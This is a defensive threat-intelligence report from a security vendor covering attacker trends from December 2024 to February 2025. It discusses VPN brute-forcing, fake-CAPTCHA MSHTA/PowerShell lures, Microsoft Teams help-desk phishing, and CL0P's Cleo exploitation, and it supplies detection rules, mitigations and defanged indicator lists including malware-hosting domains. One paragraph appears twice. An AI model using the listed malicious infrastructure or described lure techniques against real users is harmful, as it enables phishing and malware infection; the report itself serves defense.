Key Findings
Between December 2024 and February 2025 (“the reporting period”), ReliaQuest analyzed customer incidents, detection trends, and threat actor behavior to reveal key attacker techniques and emerging malware trends. In this report, we frame these findings within the broader threat landscape, providing real-world case studies, actionable recommendations to defend against similar attacks, and predictions for what lies ahead.
The attacks analyzed in this report are typically carried out by financially motivated actors. Our insights are relevant across industries, highlighting how these attackers deliberately probe for defense weaknesses and prey on organizations struggling to keep up with the ever-increasing pace of cyber attacks. Keep reading for an in-depth analysis to help your organization stay ahead of evolving threats and strengthen its defenses against emerging challenges.
Top Tactics Targeting Enterprise Environments
In this section, we take a closer look at a selection of MITRE tactics to identify the latest attacker trends and the reasons behind their popularity.
Initial Access via VPN Brute-Forcing Up 21.3%
Figure 1: Top MITRE ATT&CK initial access techniques in true-positive incidents (% of total) during reporting period
During the reporting period, initial access attempts targeting external remote services like VPNs1, RDP, and virtual desktop infrastructure (VDI) surged by 21.3% compared to the same time last year (December 2023–February 2024).
Most of these attempts involved brute-forcing, likely linked to a large-scale brute-force attack observed in late January 2025 against internet-facing remote-access devices like VPNs. While the exact goal of this attack remains unknown, it was almost certainly aimed at identifying devices with weak or valid leaked credentials to facilitate initial access. Although outside the reporting period, leaked chat logs in March 2025 revealed an automated brute-forcing tool used by the ransomware group “Black Basta,2” underscoring how valuable this method is for attackers seeking initial access.
As highlighted in our 2025 Annual Cyber-Threat Report, insecure external remote services are the most effective entry point for attackers. By simply authenticating to networks, they can evade detection and seamlessly blend in with legitimate users—making this method highly appealing for adversaries.
Administrator Account Brute-Forced via RDP: In January 2025, GreyMatter flagged a suspicious file, System Informer, installed on a customer’s system. This open-source tool, commonly used for monitoring system resources, can also expose host information to attackers. Our investigation uncovered malicious discovery commands executed using PSExec and Netscan.exe. Using GreyMatter Respond, we immediately isolated the compromised host. Further analysis revealed that the system had been exposed to the internet via RDP, and the Windows Administrator account had been brute forced. Thanks to swift detection and response, the host was contained before the attacker could initiate lateral movement.
MSHTA Abuse for Defense Evasion Jumps 7.8%
Figure 2: Top MITRE ATT&CK defense evasion techniques in true-positive incidents (% of total) during reporting period
Proxy execution with MSHTA, a native Windows binary for running HTML application files, increased 7.8%, climbing from 16th to second place compared to the same time last year.
This rise in MSHTA abuse is almost certainly driven by the increase in deceptive CAPTCHAs delivered using the JavaScript framework “ClearFake.” These fake CAPTCHAs trick victims into executing malicious MSHTA commands in Windows run prompts, bypassing traditional security controls designed to detect file-based delivery methods like phishing.
By convincing users to copy and paste MSHTA commands, attackers can execute malicious files remotely and outside the user’s browser, evading browser-based protections like Google Safe Browsing.
Lateral Movement: Internal Phishing Continues to Dominate
Figure 3: Top MITRE ATT&CK lateral movement techniques in true-positive incidents (% of total) during reporting period
Internal spearphishing remains the most common technique for lateral movement and is often paired with inbox rule hiding to conceal incoming emails in a compromised user’s inbox.
This method is highly effective because it takes advantage of the credibility of known senders. According to our 2025 Annual Threat Report, nine out of ten phishing emails involved in successful account compromises originated from trusted partner organizations.
By gaining access to internal accounts, attackers can send phishing emails to other employees while hiding replies from the account owner. This allows them to respond freely and advance their attack. The risk posed by internal phishing depends on the adversary’s goals but often leads to financial fraud, additional account compromises, or malware infections.
First Sightings of the Sneaky 2FA Phishing Kit: Phishing kits like “Sneaky 2FA” simplify compromising business email accounts, fueling internal phishing campaigns. First observed in January 2025, Sneaky 2FA operates as a phishing-as-a-service (PhaaS) and offers advanced features like adversary-in-the-middle (AiTM) functionality to bypass multifactor authentication (MFA), anti-analysis tools to redirect non-targeted traffic to Wikipedia, and convincing replicas of Microsoft authentication portals.
Early in 2025, GreyMatter detected the creation of a suspicious email inbox rule for a manufacturing sector customer. Our investigation revealed that a threat actor had gained access to the organization, tracing the initial compromise back to an initial phishing attack that involved a Sneaky 2FA domain impersonating a Microsoft login portal. Using GreyMatter Respond, we revoked sessions for the impacted account and promptly reset credentials.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Enable these detection rules to prevent the top initial access, defense evasion, and lateral movement techniques mentioned in this report:
| Detection Rule | MITRE ATT&CK ID | Summary |
|---|---|---|
| Successful Remote Brute Force | TA0003: T1133 – External Remote Services | This rule detects successful logins that occur shortly after multiple failed authentication attempts against a VPN or public-facing host, potentially indicating unauthorized access through password guessing. |
| Suspicious MSHTA Command Execution | TA0002: T1059.003 – Windows Command Shell TA0005: T1218.005 – Mshta | This rule monitors the execution of suspicious MSHTA.exe commands seen in past compromises, like phishing attacks where users unknowingly ran HTML application files hidden within encrypted .zip files. |
| Phishing Link Clicked Followed by MFA | TA0043: T1598.002 – Spearphishing Attachment TA0008: T1534 – Internal Spearphishing TA0043: T1598.003 – Spearphishing Link TA0001: T1566.002 – Spearphishing Link | This rule detects phishing attacks where users are tricked into entering credentials on fake sites and approving MFA requests. It flags malicious URLs clicked in emails, followed by successful MFA authentication. |
Your Action Plan
- Secure Entry Points: Pair MFA with Conditional Access policies and device certificates for VPN authentication. Audit exposed RDP sessions, remove unintended public-facing instances, and use a jump box as a secure gateway instead of exposing individual systems.
- Identify Defense Evasion: Enable mailbox auditing in Microsoft 365 to detect suspicious inbox rule changes—a telltale sign of account compromise. Monitor MSHTA.exe activity by enabling Audit Process Creation and command-line logging (Event ID 4688), as attackers often use MSHTA.exe to execute payloads.
- Prevent AiTM Phishing: Implement Fast IDentity Online (FIDO) to secure high-risk accounts, as it’s resistant to AiTM attacks. Educate employees to spot phishing attempts from trusted sources like partners or internal accounts—not just external ones.
ReliaQuest Investigates: Rise and Fall of Storm-1811 Attacks
In October 2024, the Russia-linked Black Basta ransomware group unveiled a new technique weaponizing Microsoft Teams for phishing, exploiting the trust users place in corporate chat platforms. In December 2024, “Storm-1811,” also known as “STAC5777,” (see table below) escalated Microsoft Teams phishing attacks, causing a significant spike in activity. However, by late February 2025, attack activity had noticeably declined, likely because of internal turmoil within Black Basta, which led to chats being leaked around the same time3 (see Figure 4).
Figure 4: Microsoft Teams phishing attacks, December 2024–February 2025
Storm-1811 Campaign Key Findings
Initial Access:
- In 83% of incidents, the sender display name was “Help Desk.”
- Employees in sales and accounting departments were the most frequently targeted.
- Targeted employees received Microsoft Teams messages predominantly between 12p.m. and 3p.m. on weekdays.
- In 58% of incidents, the sender domain was “onmicrosoft[.]com.”
C2
- If the targeted employee engaged, the attacker would convince them to grant device access through the remote monitoring and management (RMM) tool Quick Assist, establishing command-and-control (C2).
Persistence
- If C2 was established, the attacker executed the malicious Dynamic Link Library (DLL) file “winhttp.dll,” which was sideloaded with the legitimate Microsoft executable OneDriveStandaloneUpdater.exe. This setup ensured persistence through system reboots via the startup folder.
If Black Basta’s internal conflicts remain unresolved, affiliates like Storm-1811 are likely to leave and take their techniques to other ransomware-as-a-service (RaaS) providers. This shift could lead to overlapping tactics, techniques, and procedures (TTPs) across other threat clusters, complicating attribution and potentially altering the nature of attacks.
Defenders should prepare for this development, as Black Basta affiliates may apply their techniques within other groups, making adversary behavior harder to predict and complicating efforts to anticipate objectives.
The table below shows the attribution of Microsoft Teams phishing and vishing attacks.
Analysis of Competing Hypothesis Attribution Matrix
| Evidence | Storm-1811 | “FIN7” | “CURLY SPIDER” | STAC5777 | “STAC5143” |
|---|---|---|---|---|---|
| Microsoft Teams Phishing | ++ | — | – | ++ | ++ |
| Voice Phishing | ++ | ++ | ++ | ++ | ++ |
| Quick Assist RMM for C2 | ++ | — | ++ | ++ | — |
| DLL Side-Loading with “winhttp.dll” | ++ | — | — | ++ | — |
| Microsoft Tenant Help-Desk Impersonation | ++ | — | — | ++ | ++ |
| Collaborates with Black Basta RaaS | ++ | + | ++ | ++ | ++ |
Key
- ++: Evidence strongly supports the hypothesis and is highly consistent with the threat cluster’s known behavior.
- +: Evidence somewhat supports the hypothesis but is not definitive or conclusive.
- – : Evidence weakly contradicts the hypothesis but does not strongly disprove it.
- —: Evidence strongly contradicts the hypothesis and is highly inconsistent with the threat cluster’s known behavior.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Below is an example detection rule we recommend implementing to effectively identify Microsoft Teams phishing attacks.
| Detection Rule | MITRE ATT&CK ID | Summary |
|---|---|---|
| Potential Microsoft Teams Phishing | TA0001: T1566 – Phishing TA0043: T1598 – Phishing for Information | This rule detects inbound Microsoft Teams messages from external tenants that share properties with true-positive phishing incidents. External attackers can use tools like TeamsPhisher to deliver malicious messages, including links to file-sharing sites and/or credential harvesting sites. Incoming messages from untrusted external domains should be reviewed for authenticity. |
Your Action Plan
- Limit External Channels: Disable external chat in Microsoft Teams through the admin center to prevent phishing attacks from external attackers. If external communication is required, implement an allowlist to restrict interactions to trusted domains.
- Prioritize Established Procedures: Train employees to strictly follow established procedures and communication channels when engaging with IT. Threat actors often impersonate IT personnel via direct calls to manipulate employees.
- Monitor Microsoft Team Chats: Enable logging for Microsoft Team “ChatCreated” operations4 to enhance detection capabilities and provide critical context for efficient investigations.
Top Malware You Should Know
Figure 5: Top three malware in true-positive incidents (% of total) during reporting period. ClearFake malware jumped 17% during the reporting period, rising from 13th to 1st place compared to September-November 2024
This surge in ClearFake activity is almost certainly driven by its adoption of the “ClickFix” technique. This method tricks users into copying malicious commands into PowerShell or the Windows Run prompt (see Figure 5), bypassing browser and antivirus protections for higher success rates. The rise in MSHTA proxy execution coincides with this technique, as it uses the Windows Run prompt to execute malicious commands.
We’ve observed ClearFake delivering “Lumma,” an info-stealing malware, which is now sold as malware-as-a-service (MaaS) on dark-web forums like XSS. For example, a December 2024 post advertised the malware’s ability to impersonate CAPTCHAs and its copy-and-paste execution feature to bypass browser-based detections like Windows Defender SmartScreen and file download reputation check. Now that malware featuring the copy-paste technique can be purchased, its accessibility to attackers has increased. Alternative variants using this technique are likely to follow to compete in the cybercriminal market.
Figure 6: Fake CAPTCHA Run Command
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Below is an example detection rule we recommend implementing to effectively identify malware activity.
| Detection Rule | MITRE ATT&CK ID | Summary |
|---|---|---|
| Suspicious Encoded PowerShell Execution | TA0002: T1059.001 – PowerShell TA0011: T1132.001 – Standard Encoding TA0005: T1027.010 – Command Obfuscation TA0005: T1140 – Deobfuscate/Decode Files or Information | Threat actors and malware often leverage PowerShell for execution, often using encoded commands to obfuscate their payloads. This alert identifies potentially compromised hosts by detecting PowerShell command-line arguments that, when paired with encoded commands, may indicate suspicious activity. |
Your Action Plan
- Disable the Run Prompt: Implement a Group Policy to disable the Windows Run command prompt for departments that don’t require it. This prevents users from executing instructions provided by fake CAPTCHAs.
- Log PowerShell Events: Use Group Policy to enable PowerShell logging, including script block logging and transcription. This ensures visibility for detecting malicious PowerShell commands originating from copy-paste malware.
- Disable Clipboard Pasting: Disable pasting in Windows Command Prompt and PowerShell, commonly used by ClickFix, by setting the registry path HKEY_CURRENT_USER\Console value to zero via Group Policy. Test this change first and apply it only to departments where disabling QuickEdit mode won’t disrupt operations.
CL0P Ransomware Rises to Top Spot
Figure 7: Number of organizations listed on ransomware data-leak sites, by site, during reporting period
Financially motivated threat actors use data-leak sites to pressure organizations through extortion, with the “CL0P” ransomware group identified as the most active during the reporting period. Compared to the three months prior (September–November 2024), “RansomHub” remains the most consistent group, likely because of its attractive profit split, which was revised in January 2025.
The spike in CL0P’s listings is almost certainly linked to its exploitation of Cleo software (CVE-2024-50623)5 in December 2024. Adversaries like CL0P are drawn to exploits that impact widely used, internet-facing software, as a single exploit can yield high returns across multiple organizations. This tactic may also increase profits for CL0P members by eliminating the need to share revenue between affiliates and ransomware developers.
This highlights the critical risk of failing to implement mitigations, apply patches, or remove vulnerable devices from the internet when critical vulnerabilities are actively exploited. Organizations should assess their internet-facing exposure and reduce their attack surface by removing or securing exposed devices wherever possible.
Figure 8: Organizations listed on ransomware data-leak sites, by sector, Sep 1–Nov 30, 2024 vs. Dec 1, 2024–Feb 28, 2025
A review of the top industries named on ransomware leak sites reveals no changes in the top two spots compared to the previous three months. However, the retail trade sector experienced a staggering 153% increase in listings, climbing from fifth to third place (see Figure 7).
This surge is almost certainly heavily impacted by CL0P’s exploitation of Cleo Harmony, software that enables enterprise retail organizations to streamline and automate data integration and secure file transfers. Cleo Harmony facilitates critical processes such as exchanging invoices, purchase orders, and shipping notifications with suppliers and logistics providers. Unfortunately, the widespread adoption of vulnerable software makes it an attractive target for adversaries, emphasizing the need for stringent supply-chain and vendor-risk management programs.
Whether CL0P is conducting exploit development research internally or collaborating with exploit brokers, it’s likely the group will launch another mass exploitation attack within the next year, following their momentum of exploiting managed file transfer (MFT) applications, including Accellion, GoAnywhere, MOVEit, and Cleo. Organizations should remain vigilant about the risks posed by mass-market, vendor-provided software that’s publicly accessible, as it continues to be an attractive target for adversaries.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Effectively identify CL0P ransomware activity with this detection rule:
| Detection Rule | MITRE ATT&CK ID | Summary |
|---|---|---|
| SQL Command Injection | TA0001: T1190 – Exploit Public-Facing Application TA0003: T1505.001 – SQL Stored Procedures | An attacker leveraging SQL injection can run commands against the database’s operating system to establish persistence. This alert detects database queries containing suspicious SQL or operating system commands that may indicate a command injection attempt. |
Your Action Plan
- Deploy an NGFW: Place next-generation firewalls (NGFWs) in front of critical public-facing assets, such as managed file transfer servers, to enable deep packet inspection and the detection of malicious payloads, such as SQL injection, stopping attack attempts in their tracks.
- Prioritize Patching External-Facing Assets: Focus on assets that house sensitive data or could lead to initial access. Develop fallback plans in case assets need to be removed from public access.
- Create a C-SCRM Program: Implement Cybersecurity Supply Chain Risk Management (C-SCRM) programs that include supplier risk assessments, vendor contractual agreements, and failover processes for business-critical software under active exploitation. This approach mitigates risks from insecure development practices and ensures business continuity during exploitation attempts.
Key Takeaways and What’s Next
Attackers continually probe organizations for weaknesses while quickly adopting new techniques to increase their success rates. This is evident in the rapid adoption of malware leveraging ClickFix and the continued use of Microsoft Teams for phishing—both almost certainly designed to mislead security teams and bypass defenses. Similarly, CL0P’s continued success with mass exploitation campaigns highlights an effective strategy that will likely be repeated and adopted by other financially motivated groups.
Looking ahead, the cybersecurity landscape will continue to rapidly evolve, with adversaries developing new attack methods and borrowing proven techniques pioneered by others. Additionally, affiliates are likely to shift to other groups or establish their own operations to maximize profits.
Enterprising Affiliates Gain Independence: Changes in group dynamics such as infighting within the Black Basta group and RansomHub’s reduced affiliate profit split (90% to 85%, see Figure 8) will likely push affiliates to join other groups or launch independent operations. As seen with the drop in encryption attacks in 2024, more organizations are refusing extortion demands and rebuilding networks, driving attackers toward exfiltration-only attacks. These attacks don’t require coordination with ransomware developers, enabling adversaries to eliminate profit-sharing and operate independently.
Enterprising Affiliates Gain Independence: Changes in group dynamics such as infighting within the Black Basta group and RansomHub’s reduced affiliate profit split (90% to 85%, see Figure 8) will likely push affiliates to join other groups or launch independent operations. As seen with the drop in encryption attacks in 2024, more organizations are refusing extortion demands and rebuilding networks, driving attackers toward exfiltration-only attacks. These attacks don’t require coordination with ransomware developers, enabling adversaries to eliminate profit-sharing and operate independently.
This will result in fragmented groups, overlapping TTPs, and a more diverse threat landscape, complicating attribution. Techniques like Microsoft Teams phishing will likely become more prevalent as attackers share their methods with other criminal groups.
Figure 9: RansomHub reduces affiliate profit share
Attackers Shift Toward Greater Specialization: As achieving initial access becomes more challenging because of improved defenses, the demand for access brokers will rise. For example, VPN listings advertised by initial access brokers (IABs) increased by 250% from 2023 to 2024, with “buy now” prices rising by 46%. This trend will likely fuel a surge in IAB activity as they seek to capitalize on the lucrative opportunity.
Attackers may also follow CL0P’s example by turning to exploits for mass breaches, further driving demand for specialized exploit developers. As the availability of exploits increases, costs will likely drop, lowering the barrier for other attackers to purchase and deploy these exploits—ultimately enabling more widespread attacks.
IOCs
| Artifact | Details |
|---|---|
| 98[.]185[.]158[.]20 94[.]156[.]227[.]69 174[.]114[.]231[.]18 74[.]206[.]139[.]3 207[.]188[.]157[.]230 87[.]103[.]126[.]54 94[.]156[.]227[.]68 94[.]156[.]227[.]71 76[.]138[.]103[.]65 40[.]126[.]229[.]236 189[.]182[.]97[.]191 103[.]35[.]189[.]243 128[.]234[.]18[.]140 94[.]156[.]227[.]70 45[.]61[.]150[.]97 62[.]60[.]154[.]163 82[.]42[.]84[.]202 173[.]44[.]141[.]50 107[.]158[.]128[.]20 196[.]251[.]117[.]191 47[.]249[.]3[.]152 76[.]154[.]146[.]156 94[.]156[.]227[.]67 68[.]61[.]206[.]86 95[.]158[.]13[.]3 91[.]205[.]164[.]183 88[.]97[.]239[.]161 |
Source IP addresses identified conducting brute-force attacks on external remote services. Before implementing network blocks, determine if any of the IP addresses are associated with websites that are essential for business operations. |
| assets-gbr.mkt.dynamics[dot]com files-share.portseattles[dot]org | Sneaky2FA phishing domains. |
| [email protected][dot]com [email protected][dot]com [email protected][dot]com [email protected][dot]com [email protected][dot]com [email protected][dot]com [email protected][dot]com [email protected] admin_26@tntheatre674[dot]onmicrosoft[dot]com | Microsoft Teams phishing tenants. For further investigation, threat hunts can be conducted on the provided tenants that were used to create chats. |
| 52[.]168[.]112[.]80 98[.]158[.]100[.]22 52[.]168[.]112[.]87 78[.]46[.]67[.]201 13[.]86[.]223[.]91 13[.]86[.]223[.]89 52[.]168[.]112[.]86 52[.]148[.]43[.]94 52[.]168[.]112[.]8498.158.100.22 |
Microsoft Teams phishing source IP addresses. For further investigation, threat hunts can be initiated on the provided IP addresses to identify previous Microsoft Team chats created. |
| human-verify[dot]shop/xfiles/verify.mp4 sirax[dot]shop/redclaprubz.m4a teroniga[dot]shop/remingofugu.m4a lack-behind-came-verification.trycloudflare[dot]com/cloudfla u1.tightlyreporter[dot]shop/sosalkino[dot]mov sandbox.yunqof[dot]shop/macan.mp3 igameinfinity[dot]shop/suno.mp3 xx.retweet[dot]shop |
ClearFake Domains |
1hxxps://www.bleepingcomputer[.]com/news/security/massive-brute-force-attack-uses-28-million-ips-to-target-vpn-devices/
2hxxps://www.forbes[.]com/sites/daveywinder/2025/03/15/now-ransomware-attackers-can-brute-force-your-vpns-and-firewalls/
3hxxps://www.securityweek[.]com/black-basta-leak-offers-glimpse-into-groups-inner-workings/
4hxxps://learn.microsoft[.]com/en-us/purview/audit-log-activities
5hxxps://support.cleo[.]com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623
